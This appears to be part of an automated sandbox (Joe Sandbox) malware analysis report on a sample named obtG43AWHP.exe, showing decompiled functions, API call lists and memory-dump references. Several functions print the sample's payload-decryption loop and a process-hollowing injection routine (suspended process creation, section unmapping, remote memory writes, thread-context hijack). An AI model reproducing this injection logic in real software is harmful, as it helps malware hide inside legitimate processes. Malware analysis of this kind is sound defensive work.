						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x454738; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x454745 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















    0x0040b3ac
    0x0040b3b6
    0x0040b3c0
    0x0040b3ca
    0x0040b3d1
    0x0040b3d3
    0x0040b3d3
    0x0040b3db
    0x0040b3e7
    0x0040b3f3
    0x0040b3f3
    0x0040b407
    0x0040b410
    0x0040b4bf
    0x0040b4c4
    0x0040b4c9
    0x0040b4d0
    0x0040b4d5
    0x0040b4d7
    0x0040b4da
    0x0040b4e0
    0x0040b4e2
    0x00000000
    0x0040b4ea
    0x0040b416
    0x0040b416
    0x0040b41d
    0x0040b41f
    0x0040b426
    0x00000000
    0x0040b426
    0x0040b433
    0x0040b443
    0x0040b445
    0x0040b44a
    0x0040b44d
    0x0040b453
    0x0040b455
    0x0040b457
    0x00000000
    0x0040b457
    0x0040b463
    0x0040b468
    0x0040b46e
    0x0040b46e
    0x0040b470
    0x0040b471
    0x0040b472
    0x0040b472
    0x0040b48e
    0x0040b494
    0x0040b499
    0x0040b49e
    0x0040b4a4
    0x0040b4a4
    0x0040b4a8
    0x0040b4ab
    0x0040b4b1
    0x0040b4b3
    0x00000000
    0x00000000
    0x0040b4b5
    0x0040b4b8
    0x0040b4b8
    0x0040b4b9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040b4b9
    0x0040b4a4
    0x0040b4f1
    0x0040b4f1
    0x00000000

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040152C, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040137C(0x4545e4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









    0x00401530
    0x00401532
    0x00401534
    0x00401536
    0x0040154a
    0x0040154f
    0x00401551
    0x00401555
    0x0040155d
    0x00401563
    0x0040156f
    0x00401574
    0x00401574
    0x00401579
    0x00401582
    0x00401589
    0x00401595
    0x0040159c
    0x00000000
    0x0040159c
    0x00401589
    0x004015a2

    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00405E00, Relevance: 6.0, APIs: 4, Instructions: 11
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





    0x00405e03
    0x00405e0a
    0x00405e0f
    0x00405e15
    0x00405e1a

    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00408B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x408c5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00403E88(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00403F20( &_v8, 0x408c80);
				} else {
					E00403F20( &_v8, 0x408c74);
				}
				_t32 = E00404348(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E004040F8(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00408C65);
				return E00403E88( &_v8);
			}













    0x00408b8d
    0x00408b90
    0x00408b92
    0x00408b96
    0x00408b97
    0x00408b9c
    0x00408b9f
    0x00408ba4
    0x00408bb0
    0x00408bbb
    0x00408bc6
    0x00408bcd
    0x00408be6
    0x00408bcf
    0x00408bd7
    0x00408bd7
    0x00408bfa
    0x00408c13
    0x00408c22
    0x00408c28
    0x00408c43
    0x00408c43
    0x00408c28
    0x00408c4a
    0x00408c4d
    0x00408c50
    0x00408c5d

    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0041844E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
    C-Code - Quality: 50%
    			E0041844E() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t31;
				signed int _t34;
				void* _t38;
				void* _t39;
				void* _t45;
				void* _t51;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(_t45);
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xffffffd0;
				GetSystemInfo( &_v40);
				_t34 = 0;
				_t31 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t34 == 0x20) {
						_t34 = 0;
					}
					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
					_t34 = _t34 + 1;
					_t15 = _t15 + 1;
					_t31 = _t31 - 1;
				} while (_t31 != 0);
				L5:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t38);
				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
				goto L5;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418465
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00418450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
    C-Code - Quality: 53%
    			E00418450() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t30;
				signed int _t33;
				void* _t37;
				void* _t38;
				intOrPtr _t42;
				void* _t47;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42;
				GetSystemInfo( &_v40);
				_t33 = 0;
				_t30 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t33 == 0x20) {
						_t33 = 0;
					}
					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
					_t33 = _t33 + 1;
					_t15 = _t15 + 1;
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				L4:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t37);
				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
				goto L4;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040BC54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
				void* _t6;
				void* _t13;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t17 = __edx;
				if(__edx != 0) {
					_t22 = _t22 + 0xfffffff0;
					_t6 = E00403404(_t6, _t21);
				}
				_t20 = _t6;
				E004030E4(0);
				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
				 *(_t20 + 0x18) = 0xffffffff;
				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
				_t13 = _t20;
				if(_t17 != 0) {
					E0040345C(_t13);
					_pop( *[fs:0x0]);
				}
				return _t20;
			}









    0x0040bc54
    0x0040bc58
    0x0040bc5a
    0x0040bc5d
    0x0040bc5d
    0x0040bc64
    0x0040bc6a
    0x0040bc6f
    0x0040bc83
    0x0040bc93
    0x0040bc96
    0x0040bca9
    0x0040bcac
    0x0040bcb0
    0x0040bcb2
    0x0040bcb7
    0x0040bcbe
    0x0040bcc5

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 004179B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
				void* _t3;

				L0040C518();
				if(__eax != 0) {
					_t3 = E0040A56C("WSACleanup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x004179b4
    0x004179bb
    0x004179c9
    0x004179ce
    0x00000000
    0x004179ce
    0x004179d3

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040F0A8, Relevance: 5.1, Strings: 4, Instructions: 85
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v264;
				char _v520;
				char _v524;
				signed char _t47;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr* _t75;
				void* _t78;

				_v524 = 0;
				_t75 = __edx;
				_t47 = __eax;
				_push(_t78);
				_push(0x40f1ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xfffffdf8;
				_t73 = __eax & 0x00000fff;
				if((__eax & 0x00000fff) > 0x14) {
					if(__eax != 0x100) {
						if(__eax != 0x101) {
							if(E0040F504(__eax,  &_v8) == 0) {
								E00407110( &_v524, 4);
								_t59 =  *0x4530ec; // 0x419128
								E00404194(_t75, _v524,  *_t59);
							} else {
								E00403064( *_v8,  &_v520);
								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
								E004040EC(__edx,  &_v264);
							}
						} else {
							E00403EDC(__edx, 0x40f1f4);
						}
					} else {
						E00403EDC(__edx, "String");
					}
				} else {
					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
				}
				if((_t47 & 0x00000020) != 0) {
					E00404194(_t75,  *_t75, "Array ");
				}
				if((_t47 & 0x00000040) != 0) {
					E00404194(_t75,  *_t75, "ByRef ");
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0040F1D5);
				return E00403E88( &_v524);
			}












    0x0040f0b6
    0x0040f0bc
    0x0040f0be
    0x0040f0c2
    0x0040f0c3
    0x0040f0c8
    0x0040f0cb
    0x0040f0d0
    0x0040f0d9
    0x0040f0f6
    0x0040f10e
    0x0040f12a
    0x0040f175
    0x0040f180
    0x0040f18a
    0x0040f12c
    0x0040f13e
    0x0040f153
    0x0040f160
    0x0040f160
    0x0040f110
    0x0040f117
    0x0040f117
    0x0040f0f8
    0x0040f0ff
    0x0040f0ff
    0x0040f0db
    0x0040f0e7
    0x0040f0e7
    0x0040f192
    0x0040f19d
    0x0040f19d
    0x0040f1a5
    0x0040f1b0
    0x0040f1b0
    0x0040f1b7
    0x0040f1ba
    0x0040f1bd
    0x0040f1cd

    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0041381C, Relevance: 5.1, Strings: 4, Instructions: 71
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char* _t15;
				char* _t23;
				intOrPtr _t30;
				char _t31;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;

				_v12 = 0;
				_t23 = __edx;
				_push(_t45);
				_push(0x4138c2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xfffffff8;
				_v8 = 0;
				if(__edx != 0) {
					_t39 = __eax;
					while( *_t23 != 0) {
						_t15 = _t23;
						while(1) {
							_t31 =  *_t23;
							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
								break;
							}
							_t23 = _t23 + 1;
						}
						E00403F78( &_v12, _t23 - _t15, _t15);
						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
							_t42 = _t39;
						}
						if(_t42 != 0) {
							if( *_t23 == 0x2e) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x2d) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x3e) {
								_t23 = _t23 + 1;
							}
							_t39 = _t42;
							continue;
						}
						goto L19;
					}
					_v8 = _t39;
				}
				L19:
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E004138C9);
				return E00403E88( &_v12);
			}












    0x00413827
    0x0041382a
    0x00413830
    0x00413831
    0x00413836
    0x00413839
    0x0041383e
    0x00413843
    0x00413845
    0x004138a4
    0x00413849
    0x0041384e
    0x0041384e
    0x00413852
    0x00000000
    0x00000000
    0x0041384d
    0x0041384d
    0x00413864
    0x00413873
    0x00413877
    0x0041388a
    0x0041388a
    0x0041388e
    0x00413893
    0x00413895
    0x00413895
    0x00413899
    0x0041389b
    0x0041389b
    0x0041389f
    0x004138a1
    0x004138a1
    0x004138a2
    0x00000000
    0x004138a2
    0x00000000
    0x0041388e
    0x004138a9
    0x004138a9
    0x004138ac
    0x004138ae
    0x004138b1
    0x004138b4
    0x004138c1

    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0041498C, Relevance: 5.0, Strings: 4, Instructions: 50
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
				signed int _t7;
				void* _t8;
				void* _t17;
				void* _t29;

				_push(__ecx);
				_t29 = __edx;
				_t17 = __eax;
				_t7 = E004155CC(__ecx) & 0x0000007f;
				if(_t7 > 0xd) {
					L7:
					_t8 = E00413A2C();
				} else {
					_t1 = _t7 + E004149B3; // 0x5
					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
						case 0:
							goto L7;
						case 1:
							E00413F54(_t17, 1, _t30);
							E00403F78(_t29,  *_t30, 0);
							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
							goto L8;
						case 2:
							__eax = __esi;
							__edx = 0x414a58;
							__eax = E00403EDC(__esi, 0x414a58);
							goto L8;
						case 3:
							__eax = __esi;
							__edx = 0x414a68;
							__eax = E00403EDC(__esi, 0x414a68);
							goto L8;
						case 4:
							__eax = __esi;
							__edx = 0x414a78;
							__eax = E00403EDC(__esi, 0x414a78);
							goto L8;
						case 5:
							__eax = __esi;
							__edx = 0x414a84;
							__eax = E00403EDC(__esi, 0x414a84);
							goto L8;
					}
				}
				L8:
				return _t8;
			}







    0x0041498e
    0x0041498f
    0x00414991
    0x0041499a
    0x004149a0
    0x00414a44
    0x00414a44
    0x004149a6
    0x004149a6
    0x004149ac
    0x00000000
    0x00000000
    0x00000000
    0x004149e2
    0x004149f0
    0x00414a05
    0x00000000
    0x00000000
    0x00414a0c
    0x00414a0e
    0x00414a13
    0x00000000
    0x00000000
    0x00414a1a
    0x00414a1c
    0x00414a21
    0x00000000
    0x00000000
    0x00414a28
    0x00414a2a
    0x00414a2f
    0x00000000
    0x00000000
    0x00414a36
    0x00414a38
    0x00414a3d
    0x00000000
    0x00000000
    0x004149ac
    0x00414a49
    0x00414a4c

    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040AC28, Relevance: 5.0, Strings: 4, Instructions: 28
    C-Code - Quality: 100%
    			E0040AC28() {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;
				intOrPtr* _t9;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;

				_t12 =  *0x452f70; // 0x405e70
				 *0x45478c = E0040A628(_t12, 1);
				_t13 =  *0x453040; // 0x405ef0
				 *0x454790 = E0040A628(_t13, 1);
				_t5 =  *0x452f34; // 0x454008
				 *_t5 = 0x40a7a4;
				_t6 =  *0x452fa8; // 0x454004
				 *_t6 = E0040AC18;
				_t7 =  *0x452f64; // 0x45401c
				_t16 =  *0x406188; // 0x4061d4
				 *_t7 = _t16;
				_t8 =  *0x452f98; // 0x45400c
				 *_t8 = E0040A968;
				_t9 =  *0x452fac; // 0x454010
				 *_t9 = E0040AB4C;
				_t17 =  *0x453054; // 0x454020
				 *_t17 = E0040A8B4;
				_t18 =  *0x452f24; // 0x454028
				 *_t18 = E0040A8D0;
				return E0040A8D0;
			}













    0x0040ac28
    0x0040ac3a
    0x0040ac3f
    0x0040ac51
    0x0040ac56
    0x0040ac5b
    0x0040ac61
    0x0040ac66
    0x0040ac6c
    0x0040ac71
    0x0040ac77
    0x0040ac79
    0x0040ac7e
    0x0040ac84
    0x0040ac89
    0x0040ac94
    0x0040ac9a
    0x0040aca1
    0x0040aca7
    0x0040aca9

    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3380 Parent PID: 3368

    Executed Functions

    Function 0018E080, Relevance: 16.7, APIs: 11, Instructions: 244
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0018E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0018E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0018E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0018E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0018E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0018E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0018E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0018E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0018E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0018E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0018E35A
    Memory Dump Source
    • Source File: 00000013.00000002.1554284814.0018D000.00000040.sdmp, Offset: 0018D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_18d000_obtG43AWHP.jbxd
    Function 0018E380, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
    APIs
